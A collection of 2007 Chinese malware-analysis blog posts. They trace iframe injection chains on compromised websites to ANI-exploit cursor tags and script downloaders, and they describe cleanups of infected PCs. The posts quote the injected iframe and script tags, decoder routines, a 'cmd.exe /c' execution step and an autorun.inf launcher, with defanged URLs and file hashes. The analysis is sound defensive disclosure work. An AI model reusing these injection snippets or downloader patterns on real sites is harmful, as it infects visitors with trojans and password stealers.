＜iframe src＝hxxp://qq***.h*1***48.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
---/

hxxp://w***.q**b*b**d.com/bd***.htm?001 包含代码：
/---
＜BODY style＝'CURSOR: url(hxxp://s***.g*c***uj.com/t.js)'＞

＜iframe src＝"hxxp://s***.g*c***uj.com/1.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

t.js 利用 ANI 漏洞 下载 0.exe

文件说明符 : D:\test\0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 12:55:0
修改时间 : 2007-5-15 12:55:52
访问时间 : 2007-5-15 12:56:53
大小 : 36864 字节 36.0 KB
MD5 : 03e68c72bb560cd19711afdebd63c73c

Kaspersky 报为 Worm.Win32.Delf.bs

hxxp://s***.g*c***uj.com/1.htm的内容为 Javascript 代码，功能是用unescape() 解出 变量 Words 的值并输出。

解出的Words 值为 VBScript 代码，功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe， 保存为 IE临时文件夹中的 install.com，并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

hxxp://s***.g*c***uj.com/bd.htm?001 的内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://idc**.ki*s***163.com/index.html?id＝hagk 包含代码：
/---
＜script src＝css.js＞＜/script＞
---/

hxxp://idc**.ki*s***163.com/css.js 内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

解密后的内容为JavaScript脚本代码，功能为是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://bo*ol***o*m.com/love.exe， 就是 昨天

小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd

中的那个。

hxxp://www.hao123***hao123*.cn/ok***/index.htm 包含代码：
/---
＜iframe src＝"hxxp://www.hao123***hao123*.cn/bbs/1881.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.hao123***hao123*.cn/bbs/1881.htm 包含代码：
/---
＜iframe src＝"hxxp://www.f*z***zv.com/sousuo.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.955***92**2.cn/web.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.hao123***hao123*.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.i***p**5*28.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.f*z***zv.com/sousuo.htm 包含代码：
/---
＜iframe src＝"hxxp://s***.g*c***uj.com/bd.htm?268001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://s***.g*c***uj.com/bd.htm?268001内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://www.955***92**2.cn/web.htm 包含代码：
/---
＜iframe src＝hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm 的包含使用是US-ASCII编码的字符串。到http://purpleendurer.ys168.com/ 下载 US-ASCII加密、解密程序 进行解密，得到的内容为：
/---
＜HTML＞
＜BODY＞
＜DIV id＝new_content_jp style＝"DISPLAY: none"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/1.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/2.jpg')"＞＜/DIV＞＜/DIV＞＜/DIV＞
＜SCRIPT language＝javascript src＝"hxxp://1****8d**m*m***.com/arp/run.js"＞＜/SCRIPT＞
＜/BODY＞
＜iframe src＝hxxp://www.1****8d**m*m***.com/arp/0614.htm width＝0 height＝0＞＜/iframe＞
＜/HTML＞
---/

1.jpg 和 2.jpg 利用 ANI 漏洞下载 down.exe

文件说明符 : D:\test\down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:15:51
修改时间 : 2007-5-15 13:17:39
访问时间 : 2007-5-15 13:18:17
大小 : 18944 字节 18.512 KB
MD5 : c23c3fabe68fdadd14a89bf111f8bf2e

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko

hxxp://1****8d**m*m***.com/arp/run.js 的功能是检测浏览器种类和版本，并输出 显示 1.jpg 和 2.jpg 的代码。

hxxp://www.1****8d**m*m***.com/arp/0614.htm 包含 JavaScript 和 VBScript 代码，使用代码
/---
DO WHILE LEN(S)＞1
k＝"&H"+ucase(LEFT(S,2))
p＝CLng(k)
m＝chr(p)
D＝D&m
S＝mymid(S)
LOOP
---/
解密变量 S 的值，按照变量 flag_type 的值，以VBScript、JavaScript 或 HTML的形式输出。这里flag_type 的 值 为 "vbs"，所以输出的是 VBScript 代码，功能是 利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe，保存到IE临时文件夹中，创建 down.vbs，并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

hxxp://www.hao123***hao123*.cn/ 包含代码：
/---
＜iframe src＝hxxp://www.s*en***love.com/a**/2.htm width＝50 height＝0＞＜/iframe＞
---/

hxxp://www.s*en***love.com/a**/2.htm 包含代码：
/---
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/a.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/b.jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞
＜iframe src＝v1.htm width＝0 height＝0＞＜/iframe＞
---/
a.jpg 和 b.jpg 利用 ANI 漏洞下载 hxxp://www.s*en***love.com/a**/2.exe

文件说明符 : D:\test\2.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:23:35
修改时间 : 2007-5-15 13:24:28
访问时间 : 2007-5-15 13:25:1
大小 : 23030 字节 22.502 KB
MD5 : b43b5493549c4f7658850bdbe41e8c4f

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc

hxxp://www.s*en***love.com/a**/v1.htm 包含代码：
/---
＜script src＝1.js＞＜/script＞
---/

1.js打不开，可能已不存在。

hxxp://www.i***p**5*28.cn/ 包含代码：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin4***.htm?110 width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin4***.htm?110 包含代码：
/---
＜BODY style＝'CURSOR: url(hxxp://www.08***3***25.cn/wm/d.jpg)'＞＜/BODY＞
＜/HTML＞
＜script src＝hxxp://www.08***3***25.cn/wm/0614.js＞＜/script＞
---/

d.jpg 利用 ANI 漏洞下载 hxxp://www.08***3***25.cn/wm/down.exe

文件说明符 : D:\test\down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:42:49
修改时间 : 2007-5-15 13:43:54
访问时间 : 2007-5-15 13:44:42
大小 : 16619 字节 16.235 KB
MD5 : a961822d4e5d96a4f2e58be91f83a450

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko 和 Worm.Win32.Delf.bs

hxxp://www.08***3***25.cn/wm/0614.js的内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

经过2次解密后的内容为JavaScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe，保存到%windir%，文件名由自定义函数：
/---
function gn（n）｛ var number ＝ Math.random（）＊n； return ‘~tmp’＋‘.tmp’；｝
---/
生成，即~tmp.tmp，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令： %windir%\system32\cmd.exe /c %windir%\~tmp.tmp 来运行。

hxxp://www.x**4*5*4**.cn/ 包含代码：
/---
＜iframe src＝"hxxp://qq.5**20s**f.org/4*1**/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
＜iframe src＝hxxp://qq.5**20s**f.org/4*1**/06014.htm width＝0 height＝0＞＜/iframe＞
＜iframe src＝"hxxp://www.5**4*6***0w.cn/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
＜iframe src＝"hxxp://www.m***hk***j52**0.com/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
---/

hxxp://qq.5**20s**f.org/4*1**/index.htm 包含代码：
/---
＜script src＝"hxxp://qq.5**20s**f.org/4*1**/xjz2007.js"＞＜/script＞
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.js 包含代码：
/---
document.writeln("＜iframe src＝xjz2007.htm width＝0 height＝0 frameborder＝0＞＜\/iframe＞");
document.writeln("＜DIV style＝\"CURSOR: url(\'xjz2007.bmp\')\"＞");
document.writeln("＜\/DIV＞＜\/BODY＞＜\/HTML＞")
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.htm 包含VBScript代码，不过不用解密，因为变量xinchunkuaile 值已经展示下载的文件是 6xz.exe。

文件说明符 : D:\test\6xz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:45:1
修改时间 : 2007-5-15 13:45:1
访问时间 : 2007-5-15 13:45:23
大小 : 22528 字节 22.0 KB
MD5 : 410da0576768619b234adbda5ba06bc5

Kaspersky 报为 Downloader.Win32.Small.eor

xjz2007.bmp 利用 ANI 漏洞下载 6xz.exe

hxxp://qq.5**20s**f.org/4*1**/06014.htm　的内容加入有许多空格，所含javaScript代码的功能是其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载6xz.exe，保存为ie.exe，创建 ie.vbs，并利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
其中还包含一个自定义函数Exploit（）。

hxxp://www.5**4*6***0w.cn/index.htm　包含代码：
/---
＜iframe src＝"hxxp://www.p***um**a163**.com/p***u/709671697.htm?56" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
s"＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/709671697.htm?56　包含代码：
/---
＜script src＝614.js＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/614.js的内容与

小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd

中的相同，下载 pu.exe。

hxxp://www.m***hk***j52**0.com/index.htm　包含代码：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin16.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin16.htm 内容与 hxxp://www.08***3***25.cn/wm/xin4***.htm?110相同。

hxxp://qq***.h*1***48.cn/ 打不开。

小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj等

endurer 原创
2007-05-14 第1版

该网站的网页是保存了腾讯官方网站的内容后进行修改的，相当具有迷惑性。

在网页中发现代码：
＜iframe src＝"hxxp://www.p***um**a163**.com/p***u/1248481.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://vip.yc***0*5.com/money***.htm?id＝40" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜script＞var pop_id＝1317;＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/1248481.htm 的包括2部分恶意代码。

第1部分是US-ASCII编码的字符串。到http://purpleendurer.ys168.com/ 下载 US-ASCII加密、解密程序 进行解密，得到的内容为：
/---
＜html＞
＜body＞
＜link rel＝"stylesheet" href＝"css.css"＞
＜/body＞
＜/html＞
---/
css.css 的内容为：

/---
＜STYLE type＝text/css＞
＜!--
body {CURSOR: url('hxxp://www.p***um**a163**.com/p***u/hjjasd.jpg')}
--＞＜/STYLE＞
---/
hjjasd.jpg（Kaspersky 报为 Exploit.Win32.IMG-ANI.ac），利用ANI漏洞下载 1.exe

文件说明符 : D:\test\1.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-5-14 12:30:13
修改时间 : 2007-5-14 12:31:22
访问时间 : 2007-5-14 12:32:32
大小 : 95232 字节 93.0 KB
MD5 : 32073dc3d803d6ffb3521510f77d9bb0

Kaspersky 报为Worm.Win32.Viking.lj，瑞星报为 Worm.Viking.sv

第2部分是：
/---
＜script src＝614.js＞＜/script＞
---/

614.js 的内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

解密后的内容为JavaScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 pu.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number＝Math.random（）＊n；return Math.round（number）＋‘.exe’｝
---/
生成，即 ***.exe，其中***为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令： %windir%\system32\cmd.exe /c %windir%\***.exe 来运行。

pu.exe 与 1.exe完全相同。

hxxp://vip.yc***0*5.com/money***.htm?id＝40 包含代码：
/---
＜script src＝css.js＞＜/script＞
---/

css.js 的内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

解密后的内容为JavaScript脚本代码，功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://bo*ol***o*m.com/love.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number＝Math.random（）＊n；return Math.round（number）＋‘.exe’｝
---/
生成，即 ***.exe，其中***为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令： %windir%\system32\cmd.exe /c %windir%\***.exe 来运行。

文件说明符 : D:\pe\tools\virus\love.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-14 12:34:2
修改时间 : 2007-5-14 12:34:4
访问时间 : 2007-5-14 0:0:0
大小 : 46455 字节 45.375 KB
MD5 : 88df1383078fdfa55d5ec6a70c39cdc4

Kaspersky 报为 Trojan-Dropper.Win32.Small.axi

某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码

endurer 原创
2007-05-11 第1版

该网站页面被植入代码：
/---
＜iframe src=hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm width=0 height=0＞＜/iframe＞
---/

hxxp://web**.5***9*cn.cn/n*a***p*ole*on/windows**/index.htm（Kaspersky报为：Trojan-Downloader.VBS.Psyme.de）的内容为vbscript脚本，功能是利用自定义函数
/---
function UnEncode（temp）
but＝67
for i ＝ 1 to len（temp）
if mid（temp，i，1）＜＞ "琳" then
If Asc（Mid（temp， i， 1）） ＜ 32 Or Asc（Mid（temp， i， 1）） ＞ 126 Then
a ＝ a ＆ Chr（Asc（Mid（temp， i， 1）））
else
pk＝asc（mid（temp，i，1））-but
if pk＞126 then
pk＝pk-95
elseif pk＜32 then
pk＝pk＋95
end if
a＝a＆chr（pk）
end if
else
a＝a＆vbcrlf
end if
next
UnEncode＝a
end function
---/
解密并输出变量hu的值。

变量hu的值解密输出的是一段vbscript脚本，功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 lsass.exe，保存为%temp%/winlogin.exe，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。

文件说明符 : D:\test\lsass.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-10 21:11:27
修改时间 : 2007-5-10 21:11:28
访问时间 : 2007-5-10 0:0:0
大小 : 309760 字节 302.512 KB
MD5 : f71f70cef3c5f71059f042516390262d

瑞星报为 Backdoor.Gpigeon.GEN

抓获会关闭瑞星实时监控的HiJack.dll、Worm.Win32.Agent.z等/v2

endurer 原创
2007-05-14 第2版 补充瑞星的反应
2007-05-10 第1版

一位朋友说他的电脑中的瑞星的实时监控会自动关闭，即使手动打开后，过一会又会自动关闭，U盘也打不开，让偶帮忙检修。

检查发现，这位朋友用的瑞星病毒库是2007-02-11的，升不了级。

用 pe_xscan 扫描 log 并分析，发现如下可疑项：
/===
pe_xscan 07-03-17 by Purple Endurer
2007-5-10 21:31:14
Windows XP Service Pack 2(5.1.2600)
管理员用户组

C:\WINDOWS\Explorer.EXE * 1400 2004-8-17 12:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Windows Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? explorer EXPLORER.EXE
C:\Program Files\Internet Explorer\PLUGINS\HiJack.dll 2007-5-10 15:9:40 Microsoft(R) Windows (R) System 5.00.1.0.1 Microsoft Corporation Windows DLL Copyright (C) 2006.6 1. 0. 0. 1 Microsoft Corporation ? System System.dll

H:\autorun.inf
/-----
[autorun]
open=Ghost.pif
shellexecute=Ghost.pif
shell\Auto\command=Ghost.pif
shell=Auto
-----/

O24 - [] - {03F6E661-0D5F-3FAD-3E2B-E261E3CB6CD2} = C:\Program Files\Internet Explorer\PLUGINS\HiJack.dll
===/

其中H：为U盘盘符。

检查H盘，发现 Ghost.pif 和 TIMP1atform.exe。

到 http://purpleendurer.ys168.com/ 下载 FileInfo 和 bat_do 0.0.0003 beta1。

用 FileInfo 提取文件信息如下：

文件说明符 : C:\Program Files\Internet Explorer\PLUGINS\HiJack.dll
属性 : ASH-
语言 : 中文(中国)
文件版本 : 1. 0. 0. 1
说明 : Microsoft Corporation Windows DLL
版权 : Copyright (C) 2006.6
备注 :
产品版本 : 5.00.1.0.1
产品名称 : Microsoft(R) Windows (R) System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : System
源文件名 : System.dll
创建时间 : 2007-5-9 11:41:25
修改时间 : 2007-5-10 15:9:40
访问时间 : 2007-5-10 0:0:0
大小 : 12341 字节 12.53 KB
MD5 : f3d36c0a5bac3eae2a28063cac087102

Kaspersky 报为 Trojan-Downloader.Win32.Agent.bmo，瑞星报为：Trojan. HiJack.a

文件说明符 : H:\Ghost.pif
属性 : ASH-
获取文件版本信息大小失败!
创建时间 : 2007-5-10 16:12:50
修改时间 : 2007-5-9 11:41:22
访问时间 : 2007-5-10 0:0:0
大小 : 18997 字节 18.565 KB
MD5 : 45680654f7e984aa1781fbee26603042

Kaspersky 报为 Trojan-Downloader.Win32.Agent.bmo

文件说明符 : H:\TIMP1atform.exe
属性 : ASHR
获取文件版本信息大小失败!创建时间 : 2007-1-22 10:14:35
修改时间 : 2007-5-10 16:57:42
访问时间 : 2007-5-10 0:0:0
大小 : 266752 字节 260.512 KB
MD5 : 049058e75e502174052a23655034cbaa

Kaspersky 报为 Worm.Win32.Agent.z

用 bat_do 0.0.0003 beta1 调用RAR打包，并使用延时删除。

重启电脑后，瑞星实时监控不再自动关闭……

安装瑞星卡卡安全助手，卸载 O24 项。

抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等

endurer 原创
2007-05-08 第1版

一位朋友，说他的电脑最近运行很慢，让偶帮忙检修。

下载 pe_xscan 扫描 log 并分析，发现如下可疑项：
/---
pe_xscan 07-04-12 by Purple Endurer
2007-5-8 12:12:51
Windows XP Service Pack 2(5.1.2600)
管理员用户组

[System Process] * 0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm23.tmp..rom 2007-5-8 10:59:4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hyso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qqso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\myso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgs0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wls0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wos0.dll 2007-5-8 10:58:50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso0.dll 2007-5-8 10:58:48
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso0.dll 2007-5-8 10:58:48
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso0.dll 2007-5-8 10:58:46
C:\WINDOWS\System32\svchost.exe * 884 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 Generic Host Process for Win32 Services ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? svchost.exe svchost.exe
c:\windows\system32\syst.dll 2007-3-22 19:35:54
C:\WINDOWS\Explorer.EXE * 264 2004-8-17 12:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Windows Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? explorer EXPLORER.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso0.dll 2007-5-8 10:58:46
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso0.dll 2007-5-8 10:58:48
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso0.dll 2007-5-8 10:58:48
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wos0.dll 2007-5-8 10:58:50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgs0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wls0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\myso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qqso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hyso0.dll 2007-5-8 10:58:52
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm23.tmp..rom 2007-5-8 10:59:4
C:\Program Files\Common Files\Real\Update_OB\realsched.exe * 272 2006-8-24 11:18:44 RealPlayer (32-bit) 0.1.0.3510 RealNetworks Scheduler Copyright ? RealNetworks, Inc. 1995-2004 0.1.0.3510 RealNetworks, Inc. RealAudio(tm) is a trademark of RealNetworks, Inc. schedapp realsched.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
D:\KAVStart.exe * 1688 2006-11-11 16:44:34 Kingsoft Internet Security 7, 6, 0, 212 Kingsoft Security Center Copyright (C) 2000 - 2006 Kingsoft Inc (KIS International Team), All Rights Reserved. 2006, 11, 10, 212 Kingsoft Corporation Kingsoft KAVStart KAVStart.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
C:\WINDOWS\wos3.exe * 1064 2007-3-26 10:10:8
C:\WINDOWS\wos3.exe 2007-3-26 10:10:8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wos0.dll 2007-5-8 10:58:50
C:\WINDOWS\wls3.exe * 1016 2007-3-26 10:10:20
C:\WINDOWS\wls3.exe 2007-3-26 10:10:20
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wls0.dll 2007-5-8 10:58:52
C:\WINDOWS\wgs3.exe * 976 2007-3-26 10:10:28
C:\WINDOWS\wgs3.exe 2007-3-26 10:10:28
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wgs0.dll 2007-5-8 10:58:52
D:\KMailMon.EXE * 2172 2006-11-11 16:44:34 Kingsoft Internet Security 7, 6, 0, 19 Kingsoft Antivirus Mail Monitor Copyright ? 2000 - 2006 Kingsoft Inc (KIS International Team), All Rights Reserved. 2006, 9, 7, 918 Kingsoft Corporation Kingsoft MailMon KMailMon.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
C:\WINDOWS\SOUNDMAN.EXE * 2196 2006-1-11 23:8:36 Realtek Sound Manager 5, 1, 0, 51 Realtek Sound Manager Copyright (c) 2001-2004 Realtek Semiconductor Corp. 5, 1, 0, 51 Realtek Semiconductor Corp. ALSMTray ALSMTray.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
C:\WINDOWS\system32\ctfmon.exe * 2224 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 CTF Loader ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? CTFMON CTFMON.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4
D:\KPFW32.EXE * 2412 2006-11-11 16:44:36 Kingsoft Internet Security 7, 6, 0, 19 Kingsoft Firewall Copyright (C) 2000 - 2006 Kingsoft Inc (KIS International Team), All Rights Reserved. 2006, 10, 24, 658 Kingsoft Corporation Kingsoft KPFW32.EXE KPFW32.EXE
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~Tm22.tmp.rom 1987-5-8 10:59:4

O2 - BHO - {8298D101-F992-43B7-8ECA-5052D885B996} - C:\WINDOWS\system32\rs.bin

O4 - HKCR\..\Run: [3u] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexpl0re.exe
O4 - HKCR\..\Run: [tuj] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe
O4 - HKCR\..\Run: [wc2imbevyfqu7g] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlog0n.exe

O4 - HKLM\..\Run: [mhsa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mhso.exe
O4 - HKLM\..\Run: [ztsa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ztso.exe
O4 - HKLM\..\Run: [rxsa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxso.exe
O4 - HKLM\..\Run: [wos3] C:\WINDOWS\wos3.exe
O4 - HKLM\..\Run: [wls3] C:\WINDOWS\wls3.exe
O4 - HKLM\..\Run: [wgs3] C:\WINDOWS\wgs3.exe
O4 - HKLM\..\Run: [wms3] C:\WINDOWS\wms3.exe
O4 - HKLM\..\Run: [jts3] C:\WINDOWS\jts3.exe
O4 - HKLM\..\Run: [qqs3] C:\WINDOWS\qqs3.exe
O4 - HKLM\..\Run: [mysa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\myso.exe
O4 - HKLM\..\Run: [qqsa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\qqso.exe
O4 - HKLM\..\Run: [hysa] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hyso.exe
O4 - HKLM\..\Run: [kernelmh] C:\WINDOWS\Kernelmh.exe

O23 - 服务: ERSvc (Error Reporting Service) - C:\WINDOWS\System32\svchost.exe -k netsvcs -> C:\WINDOWS\system32\syst.dll 2007-3-22 19:35:54(自动)

O24 - [F] - {754FB7D8-B8FE-4810-B363-A788CD060F1F} = F
O24 - [F] - {A6011F8F-A7F8-49AA-9ADA-49127D43138F} = F
O24 - [C] - {729B6C61-BDC5-4C09-A1DE-A296BA0B89EC} = C
O24 - [] - {91B1E846-2BEF-4345-8848-7699C7C9935F} = C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGQQ2.dll
---/

检查c:\windows 和 c:\windows\system32，一大堆的可疑文件，如：
/---
D:\tools\bat_do>dir c:\windows\system32 /a /od
驱动器 C 中的卷没有标签。
卷的序列号是 40FB-AD0B

c:\windows\system32 的目录

(略)
2007-03-22 19:25 70,413 dongdi.exe
2007-03-22 19:35 256,000 syst.dll
2007-03-22 19:35 256,000 sysi.dll
2007-03-22 19:35 21,657 wanmei.exe
2007-03-22 19:35 26,037 moyu.exe
2007-03-22 19:35 70,413 chajian.exe
2007-03-22 19:35 58,369 rs.bin
2007-03-24 09:07 23,657 update.txt.exe
2007-03-24 09:07 23,657 update.txt.bat
2007-03-24 19:45 13,312 NTUP1.dll
2007-03-27 11:42 17,408 WOW3.exe.bat
2007-03-27 11:51 32 sinfo.ini
2007-03-30 09:35 20,845 xy2.exe.bat
2007-04-02 08:18 32,380 xy2ok.exe.bat
2007-04-05 03:06 215,264 FNTCACHE.DAT
2007-04-16 08:18 11,264 mutou.exe.exe
2007-04-16 08:18 11,264 mutou.exe.bat
2007-04-17 08:38 25,088 s159.exe.bat
2007-04-18 12:52 24,086 szzy.exe.bat
(略)
---/

到http://purpleendurer.ys168.com/ 下载 FileInfo 和 bat_do。用 FileInfo 提取了其中一些文件的信息。

文件说明符 : C:\WINDOWS\10Sy.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:7:25
修改时间 : 2007-3-24 8:42:40
访问时间 : 2007-5-8 0:0:0
大小 : 72568 字节 70.888 KB
MD5 : 12b7b3d7773dcf24492e83ffcc34eb86

瑞星报为 Trojan.PSW.QQhx.af

文件说明符 : C:\WINDOWS\wms3.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 10:10:30
修改时间 : 2007-3-26 10:10:32
访问时间 : 2007-5-8 0:0:0
大小 : 69730 字节 68.98 KB
MD5 : d39aa9d7c7448d126ca6cc8f54ce0a21

Kaspersky报为 Trojan.Win32.Pakes，瑞星报为 Trojan.PSW.OnlineGames.xb

文件说明符 : C:\WINDOWS\jts3.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 10:10:32
修改时间 : 2007-3-26 10:10:34
访问时间 : 2007-5-8 0:0:0
大小 : 69095 字节 67.487 KB
